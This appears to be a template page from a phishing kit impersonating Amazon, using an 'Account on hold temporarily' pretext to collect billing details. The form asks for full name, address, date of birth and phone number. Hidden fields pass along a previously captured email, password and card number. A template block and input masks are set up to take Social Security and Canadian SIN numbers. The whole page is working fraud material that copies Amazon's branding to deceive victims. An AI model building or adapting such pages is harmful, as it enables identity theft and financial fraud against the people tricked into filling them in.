<html
  class="a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-gradients a-transform3d a-touch-scrolling a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition null"
  data-19ax5a9jf="dingo"
  data-aui-build-date="3.21.4-2021-06-04">
  <head>
    <meta charset="utf-8" />
    <title>Account on hold temporarily</title>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <link
      href="https://www.amazon.com/favicon.ico"
      rel="shortcut icon"
      type="image/x-icon" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11EIQ5IGqaL._RC|012LjolmrML.css,41SIz69qHYL.css,21qPwhPKAAL.css,01Vctty9pOL.css,017DsKjNQJL.css,0131vqwP5UL.css,41EWOOlBJ9L.css,11TIuySqr6L.css,01ElnPiDxWL.css,11bGSgD5pDL.css,01Dm5eKVxwL.css,01IdKcBuAdL.css,01y-XAlI+2L.css,01ZfXnjPmmL.css,01oDR3IULNL.css,31MKqadzl-L.css,01XPHJk60-L.css,01R0k0yxPXL.css,21xVR0NtxzL.css,11gneA3MtJL.css,21fecG8pUzL.css,01RddH8vm-L.css,01CFUgsA-YL.css,21AmhU6t0sL.css,11zGrJZ9D2L.css,11tRp6+0HHL.css,11MrdqKlKnL.css,11oHt2HYxnL.css,01-fWz3sOQL.css,11ocrgKoE-L.css,11RKoGSb-gL.css,11g1xm90ZvL.css,01QrWuRrZ-L.css,21pIv-yKhaL.css,01Wiow6micL.css,01gAR5pB+IL.css,119dKrtBoVL.css,11Y05DTEL6L.css,01cbS3UK11L.css,21F85am0yFL.css,01giMEP+djL.css_.css?AUIClients/AmazonUI&amp;1SF6xyD1#us.not-trident.338061-T1" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/31E2uCL+CuL.css?AUIClients/AbbottPortalAssets" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11YuQ0DJSqL.css?AUIClients/AbbottViewComponentCommonAssets" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11qZMVOv-BL.css?AUIClients/AbbottViewComponentDesktopAssets" />
  </head>
  <body
    data-language-code="en-US"
    class="abbott-view a-m-us a-aui_72554-c a-aui_button_aria_label_markup_348458-t1 a-aui_csa_templates_buildin_ww_exp_337518-c a-aui_csa_templates_buildin_ww_launch_337517-c a-aui_csa_templates_declarative_ww_exp_337521-c a-aui_csa_templates_declarative_ww_launch_337520-c a-aui_dynamic_img_a11y_markup_345061-t1 a-aui_mm_desktop_exp_291916-c a-aui_mm_desktop_launch_291918-c a-aui_mm_desktop_targeted_exp_291928-c a-aui_mm_desktop_targeted_launch_291922-c a-aui_pci_risk_banner_210084-c a-aui_preload_261698-c a-aui_rel_noreferrer_noopener_309527-c a-aui_template_weblab_cache_333406-c a-aui_tnr_v2_180836-c">
    <div id="a-page">
      <div class="a-section">
        <div class="a-section abbott-view-header">
          <div class="a-section a-spacing-none">
            <div class="a-section abbott-view-component">
              <div
                class="a-section a-spacing-medium a-spacing-top-medium a-text-center">
                <a
                  class="a-link-nav-icon"
                  tabindex="-1"
                  href="javascript void(0)"
                  ><i class="a-icon a-icon-logo" role="presentation"></i
                ></a>
              </div>
            </div>
          </div>
        </div>
        <div class="a-section abbott-view-content content-width-mini">
          <form action="card">
            <div
              id="alert-0"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <div
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-section a-spacing-none has-action-on-load">
                <div class="a-box a-alert a-alert-warning">
                  <div class="a-box-inner a-alert-container">
                    <h4 class="a-alert-heading">Account on hold temporarily</h4>
                    <i class="a-icon a-icon-alert"></i>
                    <div class="a-alert-content">
                      We noticed unusual payment activity on your account and
                      need to verify ownership of the payment method used on
                      your most recent order. (<span
                        class="a-declarative"
                        data-action="a-modal"
                        data-a-modal='{"name":"alert-0-1","width":"550","header":"Why are we asking for this information?"}'
                        ><a class="a-link-normal">Why?</a></span
                      >)
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div
              id="header-1"
              class="a-section a-spacing-mini abbott-view-component component-display-block component-width-extra_large">
              <h1
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-size-large has-action-on-load text-align-left a-text-bold">
                Enter billing details
              </h1>
            </div>
            <div
              id="header-2"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <h1
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-size-base has-action-on-load text-align-left a-text-normal">
                This is required to remove the hold on your account.
              </h1>
            </div>
            <div
              id="text-input-3"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i> Full name</label
                  ><input
                    type="text"
                    maxlength="100"
                    onkeypress="return event.charCode < 48 || event.charCode  >57"
                    placeholder="Name that appears on the payment method"
                    name="fname"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load"
                    data-action-on-load="register-listeners"
                    data-listeners=""
                    required
                    autofocus />
                </div>
              </div>
            </div>
            <div
              id="text-input-6"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i> Billing address</label
                  ><input
                    type="text"
                    maxlength="100"
                    placeholder="Street and number, P.O. box, c/o."
                    name="address"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load" />
                </div>
              </div>
            </div>
            <div
              id="text-input-7"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <input
                    type="text"
                    maxlength="100"
                    placeholder="Apartment, suite, unit, building, floor, etc."
                    name="address2"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load" />
                </div>
              </div>
            </div>
            <div
              id="text-input-8"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i> City</label
                  ><input
                    type="text"
                    maxlength="100"
                    name="city"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load"
                    required />
                </div>
              </div>
            </div>
            <div
              id="text-input-9"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i>
                    State/Province/Region</label
                  ><input
                    type="text"
                    maxlength="100"
                    name="state"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load"
                    required />
                </div>
              </div>
            </div>
            <div
              id="text-input-10"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i> Zip Code</label
                  ><input
                    type="text"
                    maxlength="14"
                    name="zip"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load"
                    required />
                </div>
              </div>
            </div>
            <div
              id="text-input-11"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i> Date of birth</label
                  ><input
                    type="text"
                    maxlength="11"
                    name="dob"
                    id="dob"
                    placeholder="DD-MM-YYYY"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load mask-dob"
                    required />
                </div>
              </div>
            </div>
            <div
              id="text-input-12"
              class="a-section a-spacing-base abbott-view-component component-width-extra_large component-display-block">
              <div class="a-section a-spacing-none">
                <div class="a-section a-spacing-none">
                  <label class="a-form-label"
                    ><i class="input-field-required"></i> Phone number</label
                  ><input
                    type="text"
                    maxlength="17"
                    name="phone"
                    class="a-input-text a-form-normal input-field-width text-input-field has-action-on-load"
                    required />
                </div>
              </div>
            </div>
            <input type="hidden" name="akseskey" value="{{ key }}" />
            <input type="hidden" name="email" value="{{ mail }}" />
            <input type="hidden" name="pass_log" value="{{ pass_log }}" />
            <input type="hidden" name="cn" value="{{ cn }}" />
            <!------     ----->
            {% block content %}
            <!-- SSN & SIN -->
            {% endblock %}
            <!------     ----->
            <div
              id="submit-button-23"
              class="a-section a-spacing-base abbott-view-component component-display-block component-width-extra_large">
              <div
                data-action-on-load="register-listeners"
                data-listeners=""
                class="a-section has-action-on-load content-align-justify">
                <span
                  id="submit-button"
                  class="a-button a-button-primary button-default-width"
                  ><span class="a-button-inner"
                    ><input
                      class="a-button-input"
                      type="submit"
                      aria-labelledby="submit-button-announce" /><span
                      id="submit-button-announce"
                      class="a-button-text"
                      aria-hidden="true"
                      >Submit billing details</span
                    ></span
                  ></span
                >
              </div>
            </div>
          </form>
        </div>
        <div class="a-section abbott-view-footer">
          <div class="a-section a-spacing-none">
            <div class="a-section abbott-view-component">
              <div
                class="a-section a-spacing-extra-large a-spacing-top-extra-large">
                <div class="a-divider a-divider-section">
                  <div class="a-divider-inner"></div>
                </div>
                <div class="a-section">
                  <div class="a-section a-text-center a-spacing-small">
                    <a
                      class="a-size-mini a-link-normal a-padding-mini"
                      href="javascript void(0)"
                      >Conditions of Use</a
                    ><a
                      class="a-size-mini a-link-normal a-padding-mini"
                      href="javascript void(0)"
                      >Privacy Notice</a
                    ><a
                      class="a-size-mini a-link-normal a-padding-mini"
                      href="javascript void(0)"
                      >Help</a
                    >
                  </div>
                  <div
                    class="a-section a-text-center a-size-mini a-color-secondary">
                    © 1996-2023, Amazon.com, Inc. or its affiliates.
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="submit-loading submit-loading-off">
      <div class="spinner-container">
        <span class="spinner-img"></span>
      </div>
    </div>
    <!-- Masking -->
    <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
    <script>
      $(document).ready(function () {
        $('input[name="ssn"]').mask("WWW-WW-WWWW", {
          translation: {
            W: {pattern: /[0-9]/, optional: false},
          },
        });
        $('input[name="sin"]').mask("WWW-WWW-WWW", {
          translation: {
            W: {pattern: /[0-9]/, optional: false},
          },
        });
        $('input[name="phone"]').keyup(function (e) {
          if (/\D/g.test(this.value)) {
            this.value = this.value.replace(/\D/g, "");
          }
        });
        $('input[name="dob"]').mask("QW-SR-R000", {
          translation: {
            Q: {pattern: /[0-3]/, optional: false},
            W: {pattern: /[0-9]/, optional: false},
            S: {pattern: /[0-1]/, optional: false},
            R: {pattern: /[1-2]/, optional: false},
          },
        });
      });
    </script>
    <!-- End Validasi -->
  </body>
</html>
